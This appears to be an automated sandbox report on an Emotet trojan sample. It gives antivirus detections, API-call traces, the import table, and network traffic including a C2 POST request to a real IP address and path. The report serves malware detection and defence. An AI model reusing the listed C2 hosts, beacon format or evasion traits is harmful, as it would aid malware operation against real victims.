6.8
高危
48 个模型检测该样本为恶意!
重新分析
更多

1b471c6ee1860a313930b80ee3bf37d544de4d5b743636301676388263dcc203

b685f589ef7c9a9007a387e9afbb4f99.exe

分析耗时

76s

最近分析

文件大小

496.1KB
静态报毒 动态报毒 100% 3U+TXQ8NMC0 AI SCORE=100 BSCOPE CLASSIC CONFIDENCE ELDORADO EMOTET GDBP GENCIRC GENERICKDZ GENERICRI GENETIC HFVU HFYVF HIGH CONFIDENCE HTQMJJ KRYPTIK MALWARE@#XR3CP6QM79VS MULDROP R + TROJ R350034 S15761361 SCORE VZZZ2W 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Emotet-FRZ!B685F589EF7C 20201023 6.0.6.653
Alibaba Trojan:Win32/Emotet.1b77c357 20190527 0.3.0.5
Tencent Malware.Win32.Gencirc.10cdfc46 20201023 1.0.0.1
Kingsoft 20201023 2013.8.14.323
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619861137.826531
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (6 个事件)
Time & API Arguments Status Return Repeated
1619861122.795531
CryptGenKey
crypto_handle: 0x006bfed8
algorithm_identifier: 0x0000660e ()
provider_handle: 0x005f57f8
flags: 1
key: fâ·F>c6¼ÆׇãÁ{( Z
success 1 0
1619861137.842531
CryptExportKey
crypto_handle: 0x006bfed8
crypto_export_handle: 0x006bfe98
buffer: f¤‰è,yр¶LÁMÔ0¾2LãËÆÔ;Yšò._C\L¼p¢á£dоÿ_‡yþGx¸I¢sP³æZçïÐf› ÁG–q¸µŒéO¹‚8¸£²Að
blob_type: 1
flags: 64
success 1 0
1619861172.529531
CryptExportKey
crypto_handle: 0x006bfed8
crypto_export_handle: 0x006bfe98
buffer: f¤ÁS‡ôªó$fëšb¯ôŸc.±ÝuÿhE‹"ÌfçZ$ öeê©RçM׍ÚGsã({ C^ Þøï‘v­Ó&éüYƒ5Ä9EWÇÂïNK ½Øþ9ò’–už
blob_type: 1
flags: 64
success 1 0
1619861177.607531
CryptExportKey
crypto_handle: 0x006bfed8
crypto_export_handle: 0x006bfe98
buffer: f¤zr<’×ÀxÖ¶µuíҝ~¹àüù‘¥–„­N³P"uÇž´6s=†›Òä­VØï.ûcº‹rL8|ÖXЦ…ó|ñ@”Ø‘q.nLŸŒd¢m¢&„ÛBRUé0*'Ý¢
blob_type: 1
flags: 64
success 1 0
1619861180.404531
CryptExportKey
crypto_handle: 0x006bfed8
crypto_export_handle: 0x006bfe98
buffer: f¤m›å×ô«HÉ ¿)%`üÏÌwZ ¬fÀ˜lŸ ýǧÆtj„‹HÆs”mƒ >œà¦ŒÃl*l !J…²¶#–?) ú59SuŒ™”ˆ¶‰²°5\ÅõË\Zu¶
blob_type: 1
flags: 64
success 1 0
1619861185.092531
CryptExportKey
crypto_handle: 0x006bfed8
crypto_export_handle: 0x006bfe98
buffer: f¤õ!^PŸ¥ +ÐŠÚMèHÁ9VLvëkq[Ë%FÈ;°¢ÁŽve„ž‡œVSžýZ9 ÿOaeþxéËk6ÑÔÔ y:óÔ+¼Ÿ ¯Í uVG×±Ioz
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 个事件)
packer Armadillo v1.71
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name None
行为判定
动态指标
Allocates read-write-execute memory (usually to unpack itself) (2 个事件)
Time & API Arguments Status Return Repeated
1619861122.061531
NtAllocateVirtualMemory
process_identifier: 368
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x003d0000
success 0 0
1619861122.107531
NtAllocateVirtualMemory
process_identifier: 368
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00590000
success 0 0
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (1 个事件)
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619861138.357531
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 个事件)
process b685f589ef7c9a9007a387e9afbb4f99.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1619861137.998531
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (6 个事件)
host 134.209.193.138
host 162.144.42.60
host 172.105.78.244
host 172.217.24.14
host 210.1.219.238
host 68.183.233.80
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1619861140.920531
RegSetValueExA
key_handle: 0x000003b4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619861140.920531
RegSetValueExA
key_handle: 0x000003b4
value:  Äœâ‹>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619861140.920531
RegSetValueExA
key_handle: 0x000003b4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619861140.920531
RegSetValueExW
key_handle: 0x000003b4
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619861140.920531
RegSetValueExA
key_handle: 0x000003cc
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619861140.920531
RegSetValueExA
key_handle: 0x000003cc
value:  Äœâ‹>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619861140.920531
RegSetValueExA
key_handle: 0x000003cc
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619861140.967531
RegSetValueExW
key_handle: 0x000003b0
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
File has been identified by 48 AntiVirus engines on VirusTotal as malicious (48 个事件)
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.69847
ClamAV Win.Dropper.Emotet-9628825-0
FireEye Trojan.GenericKDZ.69847
CAT-QuickHeal Trojan.GenericRI.S15761361
McAfee Emotet-FRZ!B685F589EF7C
Malwarebytes Trojan.MalPack.TRE
Zillya Trojan.Emotet.Win32.28063
K7AntiVirus Trojan ( 0053af701 )
Alibaba Trojan:Win32/Emotet.1b77c357
K7GW Trojan ( 0053af701 )
Cyren W32/Emotet.ARR.gen!Eldorado
Symantec Packed.Generic.554
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 90)
Kaspersky Trojan-Banker.Win32.Emotet.gdbp
BitDefender Trojan.GenericKDZ.69847
NANO-Antivirus Trojan.Win32.Emotet.htqmjj
AegisLab Trojan.Win32.Emotet.L!c
Tencent Malware.Win32.Gencirc.10cdfc46
Ad-Aware Trojan.GenericKDZ.69847
Comodo Malware@#xr3cp6qm79vs
DrWeb Trojan.Emotet.1008
VIPRE Trojan.Win32.Generic!BT
Invincea Mal/Generic-R + Troj/Emotet-CMU
McAfee-GW-Edition BehavesLike.Win32.Emotet.gh
Sophos Troj/Emotet-CMU
Jiangmin Trojan.Banker.Emotet.ogu
Avira TR/AD.Emotet.hfyvf
Antiy-AVL Trojan[Banker]/Win32.Emotet
Microsoft Trojan:Win32/Emotet.ARJ!MTB
ViRobot Trojan.Win32.Emotet.507904.E
ZoneAlarm Trojan-Banker.Win32.Emotet.gdbp
GData Win32.Trojan.PSE.VZZZ2W
TACHYON Banker/W32.Emotet.508002
AhnLab-V3 Trojan/Win32.Emotet.R350034
VBA32 BScope.Trojan.MulDrop
ALYac Trojan.Agent.Emotet
MAX malware (ai score=100)
ESET-NOD32 Win32/Emotet.CD
Rising Trojan.Kryptik!1.CB94 (CLASSIC)
Yandex Trojan.Kryptik!3U+txq8nmc0
Ikarus Trojan-Banker.Emotet
Fortinet W32/Kryptik.HFVU!tr
Panda Trj/Genetic.gen
CrowdStrike win/malicious_confidence_100% (W)
Qihoo-360 Win32/Trojan.653
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (5 个事件)
dead_host 192.168.56.101:49181
dead_host 162.144.42.60:8080
dead_host 210.1.219.238:80
dead_host 68.183.233.80:8080
dead_host 192.168.56.101:49183
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-09-01 14:53:22

Imports

Library KERNEL32.dll:
0x44b190 TerminateProcess
0x44b194 CreateThread
0x44b198 ExitThread
0x44b19c HeapReAlloc
0x44b1a0 HeapSize
0x44b1a4 GetACP
0x44b1ac GetSystemTime
0x44b1b0 GetLocalTime
0x44b1b4 HeapDestroy
0x44b1b8 HeapCreate
0x44b1bc VirtualFree
0x44b1c0 FatalAppExitA
0x44b1c4 IsBadWritePtr
0x44b1e0 SetHandleCount
0x44b1e4 GetStdHandle
0x44b1e8 HeapFree
0x44b1ec LCMapStringA
0x44b1f0 LCMapStringW
0x44b1f4 GetStringTypeA
0x44b1f8 GetStringTypeW
0x44b1fc Sleep
0x44b200 IsBadReadPtr
0x44b204 IsBadCodePtr
0x44b208 IsValidLocale
0x44b20c IsValidCodePage
0x44b210 GetLocaleInfoA
0x44b214 EnumSystemLocalesA
0x44b218 GetUserDefaultLCID
0x44b21c GetVersionExA
0x44b224 SetStdHandle
0x44b228 CompareStringA
0x44b22c CompareStringW
0x44b234 GetLocaleInfoW
0x44b238 GetCommandLineA
0x44b23c GetStartupInfoA
0x44b240 RaiseException
0x44b244 HeapAlloc
0x44b248 RtlUnwind
0x44b254 SetFileAttributesA
0x44b258 SetFileTime
0x44b264 GetFileTime
0x44b268 GetFileSize
0x44b26c GetFileAttributesA
0x44b270 GetShortPathNameA
0x44b274 GetThreadLocale
0x44b278 GetStringTypeExA
0x44b27c GetFullPathNameA
0x44b280 InterlockedExchange
0x44b288 FindFirstFileA
0x44b28c FindClose
0x44b290 DeleteFileA
0x44b294 MoveFileA
0x44b298 SetEndOfFile
0x44b29c UnlockFile
0x44b2a0 LockFile
0x44b2a4 FlushFileBuffers
0x44b2a8 SetFilePointer
0x44b2ac WriteFile
0x44b2b0 ReadFile
0x44b2b4 CreateFileA
0x44b2b8 GetCurrentProcess
0x44b2bc DuplicateHandle
0x44b2c0 SetErrorMode
0x44b2d4 GetOEMCP
0x44b2d8 GetCPInfo
0x44b2dc GetProcessVersion
0x44b2e0 TlsGetValue
0x44b2e4 LocalReAlloc
0x44b2e8 TlsSetValue
0x44b2f0 GlobalReAlloc
0x44b2f8 TlsFree
0x44b2fc GlobalHandle
0x44b304 TlsAlloc
0x44b30c LocalAlloc
0x44b310 SizeofResource
0x44b314 GlobalFlags
0x44b318 lstrcpynA
0x44b31c FormatMessageA
0x44b320 LocalFree
0x44b324 MulDiv
0x44b328 SetLastError
0x44b32c ExitProcess
0x44b330 CreateEventA
0x44b334 SuspendThread
0x44b338 SetThreadPriority
0x44b33c ResumeThread
0x44b340 SetEvent
0x44b344 WaitForSingleObject
0x44b348 CloseHandle
0x44b34c GetModuleFileNameA
0x44b350 GlobalAlloc
0x44b354 lstrcmpA
0x44b358 GetCurrentThread
0x44b35c MultiByteToWideChar
0x44b360 WideCharToMultiByte
0x44b36c lstrlenA
0x44b370 LoadLibraryA
0x44b374 FreeLibrary
0x44b378 GetVersion
0x44b37c lstrcatA
0x44b380 GetCurrentThreadId
0x44b384 GlobalGetAtomNameA
0x44b388 lstrcmpiA
0x44b38c GlobalAddAtomA
0x44b390 GlobalFindAtomA
0x44b394 GlobalDeleteAtom
0x44b398 lstrcpyA
0x44b39c GetModuleHandleA
0x44b3a0 GlobalLock
0x44b3a4 GlobalUnlock
0x44b3a8 GlobalFree
0x44b3ac LockResource
0x44b3b0 FindResourceA
0x44b3b4 LoadResource
0x44b3b8 VirtualAlloc
0x44b3bc GetModuleHandleW
0x44b3c0 GetProcAddress
0x44b3c4 GetLastError
0x44b3c8 GetFileType
Library USER32.dll:
0x44b3e4 ReleaseDC
0x44b3e8 CheckDlgButton
0x44b3ec CheckRadioButton
0x44b3f0 GetDlgItemInt
0x44b3f4 GetDlgItemTextA
0x44b3f8 SetDlgItemInt
0x44b3fc SetDlgItemTextA
0x44b400 IsDlgButtonChecked
0x44b404 ScrollWindowEx
0x44b408 IsDialogMessageA
0x44b40c SetWindowTextA
0x44b410 MoveWindow
0x44b414 ShowWindow
0x44b418 CharToOemA
0x44b41c OemToCharA
0x44b420 wvsprintfA
0x44b424 PostQuitMessage
0x44b428 ShowOwnedPopups
0x44b42c SetCursor
0x44b430 GetCursorPos
0x44b434 ValidateRect
0x44b438 TranslateMessage
0x44b43c GetMessageA
0x44b440 ClientToScreen
0x44b444 GetWindowDC
0x44b448 BeginPaint
0x44b44c EndPaint
0x44b450 TabbedTextOutA
0x44b454 DrawTextA
0x44b458 GrayStringA
0x44b45c InflateRect
0x44b460 GetClassNameA
0x44b464 GetDesktopWindow
0x44b468 GetDialogBaseUnits
0x44b46c LoadCursorA
0x44b470 DestroyMenu
0x44b474 LoadStringA
0x44b478 WaitMessage
0x44b480 WindowFromPoint
0x44b484 InsertMenuA
0x44b488 DeleteMenu
0x44b48c GetMenuStringA
0x44b490 SetRectEmpty
0x44b494 LoadAcceleratorsA
0x44b49c LoadMenuA
0x44b4a0 SetMenu
0x44b4a4 ReuseDDElParam
0x44b4a8 UnpackDDElParam
0x44b4ac BringWindowToTop
0x44b4b0 CharUpperA
0x44b4b4 CheckMenuItem
0x44b4b8 EnableMenuItem
0x44b4bc PostMessageA
0x44b4c0 SendDlgItemMessageA
0x44b4c4 MapWindowPoints
0x44b4c8 PeekMessageA
0x44b4cc DispatchMessageA
0x44b4d0 GetFocus
0x44b4d4 SetFocus
0x44b4d8 AdjustWindowRectEx
0x44b4dc ScreenToClient
0x44b4e0 EqualRect
0x44b4e4 DeferWindowPos
0x44b4e8 BeginDeferWindowPos
0x44b4ec EndDeferWindowPos
0x44b4f0 IsWindowVisible
0x44b4f4 ScrollWindow
0x44b4f8 GetScrollInfo
0x44b4fc SetScrollInfo
0x44b500 ShowScrollBar
0x44b504 GetScrollRange
0x44b50c GetScrollPos
0x44b510 SetScrollPos
0x44b514 GetTopWindow
0x44b518 MessageBoxA
0x44b51c IsChild
0x44b520 GetCapture
0x44b524 WinHelpA
0x44b528 wsprintfA
0x44b52c GetClassInfoA
0x44b530 RegisterClassA
0x44b534 GetMenu
0x44b538 GetMenuItemCount
0x44b53c GetSubMenu
0x44b540 GetMenuItemID
0x44b544 TrackPopupMenu
0x44b548 SetWindowPlacement
0x44b550 GetDlgCtrlID
0x44b554 GetKeyState
0x44b558 DefWindowProcA
0x44b55c CreateWindowExA
0x44b560 SetWindowsHookExA
0x44b564 CallNextHookEx
0x44b568 GetClassLongA
0x44b56c SetPropA
0x44b570 UnhookWindowsHookEx
0x44b574 GetPropA
0x44b578 CallWindowProcA
0x44b57c RemovePropA
0x44b580 GetMessageTime
0x44b584 GetMessagePos
0x44b588 GetLastActivePopup
0x44b58c GetForegroundWindow
0x44b590 SetForegroundWindow
0x44b594 GetWindow
0x44b598 SetWindowLongA
0x44b59c SetWindowPos
0x44b5a4 IntersectRect
0x44b5ac IsIconic
0x44b5b0 GetWindowPlacement
0x44b5b4 GetNextDlgTabItem
0x44b5b8 EndDialog
0x44b5bc GetActiveWindow
0x44b5c0 SetActiveWindow
0x44b5c4 IsWindow
0x44b5cc DestroyWindow
0x44b5d0 GetWindowLongA
0x44b5d4 GetDlgItem
0x44b5d8 IsWindowEnabled
0x44b5dc GetClientRect
0x44b5e0 PtInRect
0x44b5e4 ReleaseCapture
0x44b5e8 SetRect
0x44b5ec OffsetRect
0x44b5f0 GetWindowRect
0x44b5f4 GetParent
0x44b5f8 GetDC
0x44b5fc SetCapture
0x44b600 CopyRect
0x44b604 DrawFrameControl
0x44b608 LoadIconA
0x44b60c DrawStateA
0x44b610 CopyImage
0x44b614 DestroyIcon
0x44b618 DrawIconEx
0x44b61c GetSysColorBrush
0x44b620 FrameRect
0x44b624 DrawFocusRect
0x44b628 GetSystemMetrics
0x44b62c GetSysColor
0x44b630 MessageBeep
0x44b634 LoadBitmapA
0x44b638 GetMenuState
0x44b63c ModifyMenuA
0x44b640 SetScrollRange
0x44b644 SetMenuItemBitmaps
0x44b648 InvalidateRect
0x44b64c UpdateWindow
0x44b650 SendMessageA
0x44b654 EnableWindow
0x44b658 GetWindowTextA
0x44b65c UnregisterClassA
Library GDI32.dll:
0x44b04c SaveDC
0x44b050 RestoreDC
0x44b054 SelectPalette
0x44b058 SetBkMode
0x44b05c SetPolyFillMode
0x44b060 SetROP2
0x44b064 SetStretchBltMode
0x44b068 SetMapMode
0x44b06c SetViewportOrgEx
0x44b070 OffsetViewportOrgEx
0x44b074 SetViewportExtEx
0x44b078 ScaleViewportExtEx
0x44b07c SetWindowOrgEx
0x44b080 OffsetWindowOrgEx
0x44b084 SetWindowExtEx
0x44b088 ScaleWindowExtEx
0x44b08c SelectClipRgn
0x44b090 ExcludeClipRect
0x44b094 IntersectClipRect
0x44b098 OffsetClipRgn
0x44b09c MoveToEx
0x44b0a0 LineTo
0x44b0a4 SetTextAlign
0x44b0b0 SetMapperFlags
0x44b0b8 ArcTo
0x44b0bc SetArcDirection
0x44b0c0 PolyDraw
0x44b0c4 StartDocA
0x44b0c8 SetColorAdjustment
0x44b0cc PolyBezierTo
0x44b0d0 GetClipRgn
0x44b0d4 CreateRectRgn
0x44b0d8 SelectClipPath
0x44b0dc ExtSelectClipRgn
0x44b0e0 PlayMetaFileRecord
0x44b0e4 GetObjectType
0x44b0e8 EnumMetaFile
0x44b0ec PlayMetaFile
0x44b0f0 GetDeviceCaps
0x44b0f4 GetViewportExtEx
0x44b0f8 GetWindowExtEx
0x44b0fc CreatePen
0x44b100 ExtCreatePen
0x44b104 CreateSolidBrush
0x44b108 CreateHatchBrush
0x44b10c CreatePatternBrush
0x44b114 PtVisible
0x44b118 RectVisible
0x44b11c TextOutA
0x44b120 ExtTextOutA
0x44b124 Escape
0x44b128 GetMapMode
0x44b12c SetRectRgn
0x44b130 CombineRgn
0x44b134 CreateFontIndirectA
0x44b138 DPtoLP
0x44b13c GetTextMetricsA
0x44b144 PatBlt
0x44b148 CreateBitmap
0x44b14c GetObjectA
0x44b150 SetBkColor
0x44b154 SetTextColor
0x44b158 GetClipBox
0x44b15c GetDCOrgEx
0x44b160 CreateCompatibleDC
0x44b168 BitBlt
0x44b16c DeleteObject
0x44b170 DeleteDC
0x44b174 Rectangle
0x44b178 CreateFontA
0x44b180 SelectObject
0x44b184 PolylineTo
0x44b188 GetStockObject
Library comdlg32.dll:
0x44b674 GetFileTitleA
Library WINSPOOL.DRV:
0x44b664 DocumentPropertiesA
0x44b668 ClosePrinter
0x44b66c OpenPrinterA
Library ADVAPI32.dll:
0x44b000 RegDeleteKeyA
0x44b004 RegCreateKeyExA
0x44b008 RegOpenKeyExA
0x44b00c RegQueryValueExA
0x44b010 RegOpenKeyA
0x44b014 RegCloseKey
0x44b018 RegDeleteValueA
0x44b01c RegSetValueExA
Library SHELL32.dll:
0x44b3d0 DragQueryFileA
0x44b3d4 DragFinish
0x44b3d8 DragAcceptFiles
0x44b3dc SHGetFileInfoA
Library COMCTL32.dll:
0x44b024
0x44b028
0x44b02c ImageList_Create
0x44b030
0x44b038 ImageList_Merge
0x44b03c ImageList_Read
0x44b040 ImageList_Write
0x44b044 ImageList_Destroy

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49182 134.209.193.138 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://134.209.193.138:443/hzqgOiGW7CI/lacsl5/VkxP9i222Ga/bk422pqIF/cv6YpXaHkC/8RwckBPWv1ga/ 
POST /hzqgOiGW7CI/lacsl5/VkxP9i222Ga/bk422pqIF/cv6YpXaHkC/8RwckBPWv1ga/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------------7ed61f246bb6fe7b26f32a9b3593fcd8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 134.209.193.138:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.